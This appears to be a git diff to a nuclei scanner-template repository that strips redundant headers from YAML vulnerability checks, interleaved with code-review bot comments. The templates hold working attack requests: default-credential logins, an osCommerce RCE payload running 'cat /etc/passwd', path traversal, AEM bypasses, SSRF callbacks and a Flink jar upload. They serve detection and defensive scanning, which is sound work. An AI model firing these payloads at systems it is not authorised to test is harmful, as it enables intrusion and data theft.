{{Hostname}} - Accept-Language: en Content-Type: application/x-www-form-urlencoded - Content-Length: 98 - Connection: close data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123 diff --git a/default-logins/viewpoint/trilithic-viewpoint-default.yaml b/default-logins/viewpoint/trilithic-viewpoint-default.yaml index 6cd0fc44e6..0a09c29d59 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-default.yaml 
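Review bot: The context line `Referer: {{Hostname}}/index.php?action=login.index` has no scheme, so the header is sent as `host:port/index.php?...` rather than a URL; the rest of this diff normalises `http://{{Hostname}}` to `{{BaseURL}}` (iptime-default-login.yaml, ibm-storage-default-credential.yaml) and this line was missed. Change it to `Referer: {{BaseURL}}/index.php?action=login.index`.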
+++ b/default-logins/viewpoint/trilithic-viewpoint-default.yaml @@ -13,7 +13,6 @@ requests: - | POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1 Host: {{Hostname}} - Content-Length: 65 Content-Type: application/json Cookie: trilithic_win_auth=false diff --git a/default-logins/wso2/wso2-default-password.yaml b/default-logins/wso2/wso2-default-password.yaml index 4e89966a66..70b283e8c0 100644 --- a/default-logins/wso2/wso2-default-password.yaml +++ b/default-logins/wso2/wso2-default-password.yaml @@ -13,11 +13,9 @@ requests: POST /carbon/admin/login_action.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Accept-Language: en-US,en;q=0.9 - Connection: close - Content-Length: 29 username=admin&password=admin + redirects: false matchers: - type: word diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index 3eb0a84a80..bab7c5bb49 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -12,7 +12,6 @@ requests: - | POST /xxl-job-admin/login HTTP/1.1 Host:{{Hostname}} - Content-Length: 30 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 userName=admin&password=123456 diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index 151404574c..4a0bcf6c89 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/#/login" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: word diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml index 4fd18bcda4..b0a82d7536 100644 --- a/exposed-panels/atlassian-crowd-panel.yaml +++ b/exposed-panels/atlassian-crowd-panel.yaml 
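Review bot: The context line `Host:{{Hostname}}` has no space after the colon; nuclei's raw parser likely tolerates it, but it is the only header in this diff written that way and it reads as a typo. Change it to `Host: {{Hostname}}` for consistency with every other raw request in the change.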
@@ -10,8 +10,7 @@ requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/exposed-panels/checkmarx-panel.yaml b/exposed-panels/checkmarx-panel.yaml index 4aa65b0e49..f860ce5306 100644 --- a/exposed-panels/checkmarx-panel.yaml +++ b/exposed-panels/checkmarx-panel.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/cxwebclient/Login.aspx" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers: - type: word words: diff --git a/exposed-panels/citrix-adc-gateway-detect.yaml b/exposed-panels/citrix-adc-gateway-detect.yaml index 259215205d..e72716c96a 100644 --- a/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/exposed-panels/citrix-adc-gateway-detect.yaml @@ -11,10 +11,8 @@ requests: path: - '{{BaseURL}}/logon/LogonPoint/index.html' - '{{BaseURL}}/logon/LogonPoint/custom.html' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - _ctxstxt_CitrixCopyright + - '_ctxstxt_CitrixCopyright' \ No newline at end of file diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml index 376f2370b6..ba05fd5775 100644 --- a/exposed-panels/couchdb-exposure.yaml +++ b/exposed-panels/couchdb-exposure.yaml @@ -9,8 +9,7 @@ requests: - method: GET path: - '{{BaseURL}}/_all_dbs' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word @@ -22,4 +21,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/exposed-panels/nessus-panel.yaml b/exposed-panels/nessus-panel.yaml index 0b1a054100..8347c49d41 100644 --- a/exposed-panels/nessus-panel.yaml +++ b/exposed-panels/nessus-panel.yaml 
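Review bot: The `\ No newline at end of file` marker follows the new `- '_ctxstxt_CitrixCopyright'` line, so this commit removes the file's trailing newline while quoting the value; the second hunk of couchdb-exposure.yaml does the same to its `- 200` line, where nothing else changes. Both files should end with a single newline — yamllint's `new-line-at-end-of-file` rule flags this, and the missing newline produces a noisy diff on the next edit.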
@@ -10,18 +10,19 @@ requests: - method: GET path: - "{{BaseURL}}/server/status" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + matchers-condition: and matchers: - type: word words: - '{"code":200,"progress":null,"status":"ready"}' part: body + - type: word words: - 'NessusWWW' part: header + - type: status status: - 200 diff --git a/exposed-panels/prometheus-exporter-detect.yaml b/exposed-panels/prometheus-exporter-detect.yaml index b77807a555..75e9249134 100644 --- a/exposed-panels/prometheus-exporter-detect.yaml +++ b/exposed-panels/prometheus-exporter-detect.yaml @@ -11,8 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word @@ -20,6 +19,7 @@ requests: - Exporter # Exporters have "Exporter" in the page title (e.g, Node Exporter, Bind Exporter and so on) - /metrics condition: and + extractors: # Extract exporter name - type: regex part: body diff --git a/exposed-panels/solarwinds-orion.yaml b/exposed-panels/solarwinds-orion.yaml index 22d351173f..e50b653a22 100644 --- a/exposed-panels/solarwinds-orion.yaml +++ b/exposed-panels/solarwinds-orion.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/Orion/Login.aspx" - headers: - User-Agent: "Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0" + matchers: - type: word words: diff --git a/exposures/configs/ruijie-eg-password-leak.yaml b/exposures/configs/ruijie-eg-password-leak.yaml index 884592d400..2cd5c661e3 100644 --- a/exposures/configs/ruijie-eg-password-leak.yaml +++ b/exposures/configs/ruijie-eg-password-leak.yaml 
@@ -15,9 +15,7 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password=admin?show+webmaster+user diff --git a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml index 2af510fdfd..e07c091886 100644 --- a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml +++ b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml @@ -15,7 +15,6 @@ requests: POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - Content-Length: 111 command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. diff --git a/exposures/logs/oracle-ebs-sqllog-disclosure.yaml b/exposures/logs/oracle-ebs-sqllog-disclosure.yaml index c98779e230..44c22c100b 100644 --- a/exposures/logs/oracle-ebs-sqllog-disclosure.yaml +++ b/exposures/logs/oracle-ebs-sqllog-disclosure.yaml @@ -11,8 +11,6 @@ requests: - method: GET path: - '{{BaseURL}}/OA_HTML/bin/sqlnet.log' - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" matchers-condition: and matchers: diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 40ef7fe623..63669a0060 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml 
@@ -16,37 +16,25 @@ requests: GET /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | GET /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | OPTIONS /N0t4xist*~1*/a.aspx HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 - | OPTIONS /*~1*/a.aspx' HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 req-condition: true matchers: diff --git a/fuzzing/xff-403-bypass.yaml b/fuzzing/xff-403-bypass.yaml index 694ada23cb..ea2bdc4bf0 100644 --- a/fuzzing/xff-403-bypass.yaml +++ b/fuzzing/xff-403-bypass.yaml 
@@ -12,30 +12,18 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - | GET /test.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 req-condition: true diff --git a/iot/targa-camera-ssrf.yaml b/iot/targa-camera-ssrf.yaml index d62c5f6c25..774cf2a690 100644 --- a/iot/targa-camera-ssrf.yaml +++ b/iot/targa-camera-ssrf.yaml @@ -13,12 +13,8 @@ requests: - | POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 content-type: application/json Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - Connection: close {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://{{interactsh-url}}","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml index 31e4f967e5..a6187d442a 100644 --- a/misconfiguration/aem/aem-crx-bypass.yaml +++ b/misconfiguration/aem/aem-crx-bypass.yaml 
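Review bot: The retained `content-type: application/json` in the targa-camera-ssrf request uses a lowercase header name, while this same commit normalises the identical header in hasura-graphql-ssrf to `Content-Type: application/json`. Header names are case-insensitive on the wire, so this is a style point only, but the two templates should agree. Change it to `Content-Type: application/json`.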
@@ -12,17 +12,13 @@ requests: - | GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/123 Referer: {{BaseURL}} - Connection: close Accept-Encoding: gzip, deflate - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} - User-Agent: curl/123 Referer: {{BaseURL}} - Connection: close Accept-Encoding: gzip, deflate matchers-condition: and diff --git a/misconfiguration/aem/aem-hash-querybuilder.yaml b/misconfiguration/aem/aem-hash-querybuilder.yaml index 7b6326ae47..50ae6efbd4 100644 --- a/misconfiguration/aem/aem-hash-querybuilder.yaml +++ b/misconfiguration/aem/aem-hash-querybuilder.yaml @@ -12,13 +12,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml index d3eafcce9e..29bc15e28f 100644 --- a/misconfiguration/aem/aem-jcr-querybuilder.yaml +++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml 
@@ -11,13 +11,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: diff --git a/misconfiguration/aspx-debug-mode.yaml b/misconfiguration/aspx-debug-mode.yaml index 1879d55864..97a411ee38 100644 --- a/misconfiguration/aspx-debug-mode.yaml +++ b/misconfiguration/aspx-debug-mode.yaml @@ -13,9 +13,7 @@ requests: DEBUG /Foobar-debug.aspx HTTP/1.1 Host: {{Hostname}} Command: stop-debug - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Length: 2 matchers-condition: and diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml index 53750448b2..8ab2ad1a4c 100644 --- a/misconfiguration/cloudflare-image-ssrf.yaml +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -13,10 +13,7 @@ requests: - | GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 - Connection: close Accept: */* - Accept-Language: en matchers: - type: word diff --git a/misconfiguration/iis-internal-ip-disclosure.yaml b/misconfiguration/iis-internal-ip-disclosure.yaml index ea0a55b062..100c18eaf3 100644 --- a/misconfiguration/iis-internal-ip-disclosure.yaml +++ b/misconfiguration/iis-internal-ip-disclosure.yaml 
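Review bot: After this cleanup the aem-jcr-querybuilder request is byte-identical to the one in aem-hash-querybuilder: same `GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User`, same remaining Accept headers. Their matchers are outside the hunk and may differ, but if they do not, the two templates fire a duplicate request at every target. Consider merging them, or add a one-line comment in each saying why both exist.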
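Review bot: The aspx-debug-mode hunk keeps `Content-Length: 2` while the rest of this commit removes hard-coded Content-Length headers from raw requests and lets nuclei compute them. If a two-byte body follows (not visible in the hunk) the header is redundant; if no body follows, the request announces bytes that are never sent and a strict server may wait for them. Either drop the line for consistency or add `# literal length is intentional for the DEBUG verb probe` above it so the exception is deliberate.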
@@ -12,7 +12,6 @@ requests: - |+ GET / HTTP/1.0 Host: - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept: */* unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. diff --git a/misconfiguration/ssrf-via-oauth-misconfig.yaml b/misconfiguration/ssrf-via-oauth-misconfig.yaml index 5efd759888..c4c61ac7c2 100644 --- a/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -14,9 +14,7 @@ requests: POST /connect/register HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept-Language: en-US,en;q=0.9 - Connection: close { "application_type": "web", diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index 39d1765923..89ef10ba1b 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -9,8 +9,7 @@ requests: - method: GET path: - '{{BaseURL}}/__clockwork/app' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: status diff --git a/technologies/dell/dell-idrac6-detect.yaml b/technologies/dell/dell-idrac6-detect.yaml index fa7f636dfb..9d8bb598ff 100644 --- a/technologies/dell/dell-idrac6-detect.yaml +++ b/technologies/dell/dell-idrac6-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac7-detect.yaml b/technologies/dell/dell-idrac7-detect.yaml index f11ad8b32e..bddc00552b 100644 --- a/technologies/dell/dell-idrac7-detect.yaml +++ b/technologies/dell/dell-idrac7-detect.yaml 
@@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac8-detect.yaml b/technologies/dell/dell-idrac8-detect.yaml index bc21d228dd..e25dc371e6 100644 --- a/technologies/dell/dell-idrac8-detect.yaml +++ b/technologies/dell/dell-idrac8-detect.yaml @@ -7,8 +7,6 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" diff --git a/technologies/dell/dell-idrac9-detect.yaml b/technologies/dell/dell-idrac9-detect.yaml index 94265b4d98..7677292de5 100644 --- a/technologies/dell/dell-idrac9-detect.yaml +++ b/technologies/dell/dell-idrac9-detect.yaml @@ -7,11 +7,8 @@ info: requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - # iDRAC9 has a different endpoint than 8 and below. matchers-condition: and matchers: diff --git a/technologies/kibana-detect.yaml b/technologies/kibana-detect.yaml index 81a345b473..c35b4dd301 100644 --- a/technologies/kibana-detect.yaml +++ b/technologies/kibana-detect.yaml @@ -11,8 +11,7 @@ requests: - "{{BaseURL}}/login?next=%2F" - "{{BaseURL}}/bundles/login.bundle.js" - "{{BaseURL}}/bundles/kibana.style.css" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index 2620f82dc9..ebf42ab88b 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml 
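Review bot: The dell-idrac9-detect hunk deletes the comment `# iDRAC9 has a different endpoint than 8 and below.` along with the User-Agent header, but that comment documents why this template probes `/sysmgmt/2015/bmc/info` while the idrac6/7/8 templates in this commit probe `/data?get=prodServerGen`. The information is unrelated to the header cleanup and is still true in the new code. Keep it, for example as `- "{{BaseURL}}/sysmgmt/2015/bmc/info"  # iDRAC9 endpoint differs from iDRAC8 and below`.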
@@ -10,8 +10,7 @@ requests: path: - '{{BaseURL}}/api/jsonws' - '{{BaseURL}}/api/jsonws/invoke' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/technologies/pega-detect.yaml b/technologies/pega-detect.yaml index 81b02f15bc..d424da54ad 100644 --- a/technologies/pega-detect.yaml +++ b/technologies/pega-detect.yaml @@ -10,8 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers-condition: and matchers: - type: word diff --git a/technologies/prometheus-exposed-panel.yaml b/technologies/prometheus-exposed-panel.yaml index 371360dff8..b107509968 100644 --- a/technologies/prometheus-exposed-panel.yaml +++ b/technologies/prometheus-exposed-panel.yaml @@ -8,8 +8,7 @@ requests: - method: GET path: - '{{BaseURL}}/graph' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: diff --git a/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/vulnerabilities/apache/apache-flink-unauth-rce.yaml index bb2304cee1..ccc8012049 100644 --- a/vulnerabilities/apache/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/apache/apache-flink-unauth-rce.yaml @@ -4,7 +4,7 @@ info: name: Apache Flink Unauth RCE author: pikpikcu severity: critical - tags: apache,flink,rce + tags: apache,flink,rce,intrusive reference: - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 
@@ -15,15 +15,13 @@ requests: - | POST /jars/upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 187 Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 --8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream - nuclei + {{randstr}} --8ce4b16b22b58894aa86c421e8759df3-- matchers-condition: and diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 8941ffc298..5807e86979 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -13,11 +13,6 @@ requests: path: - "{{BaseURL}}/adjuncts/3a890183/" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and matchers: - type: word @@ -26,6 +21,7 @@ requests: - "String index out of range" part: body condition: and + - type: status status: - 500 diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index cd7dd6cd13..0336b5eaa4 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml 
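Review bot: The upload request still leaves a `poc.jar` (now filled with `{{randstr}}`) on the target JobManager and nothing in the hunk removes it; the new `intrusive` tag is appropriate, but cleanup is also possible. Flink's REST API exposes `DELETE /jars/:jarid`, so a follow-up request using the filename returned by `/jars/upload` could remove the artifact — the matcher/extractor section is outside the hunk, so I cannot tell whether that id is already captured. At minimum add `# uploads a dummy jar; the file stays on the JobManager unless deleted` above the request.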
@@ -11,14 +11,8 @@ requests: - | POST /jolokia/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0. - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded - Content-Length: 136 + { "type":"EXEC", diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index bbc2bcfd66..5f888337fc 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -13,11 +13,7 @@ requests: - | POST /install/install.php?step=4 HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close - Content-Length: 95 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A @@ -25,10 +21,7 @@ requests: - | GET /install/includes/configure.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept-Encoding: gzip, deflate Accept: */* - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 6af3338d7f..96e46cec40 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -20,7 +20,6 @@ requests: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 X-Requested-With: XMLHttpRequest Referer: {{Hostname}} 
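Review bot: The remaining `Content-Type: application/x-www-form-urlencoded` does not describe the body that follows, which is a JSON document (`{ "type":"EXEC", ...`). Jolokia appears to parse the POST body as JSON regardless, so the request likely still works, but the mismatch is misleading now that the noise headers are gone; change it to `Content-Type: application/json`, or comment why the form type is required. If the EXEC operation triggers a heap dump that is written to the target's disk, the `intrusive` tag this commit adds to flink and consul belongs here too (the info block is outside the hunk).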
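Review bot: `Referer: {{Hostname}}` in bullwark-momentum-lfi expands to `host[:port]` with no scheme, which is not a valid Referer URL; the optilink hunk in this same commit switches such headers to `{{BaseURL}}`. Use `Referer: {{BaseURL}}` here for the same reason. `X-Requested-With: XMLHttpRequest` is kept here but dropped from other templates in this commit — fine if the endpoint needs it, but a short comment would make that intent explicit.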
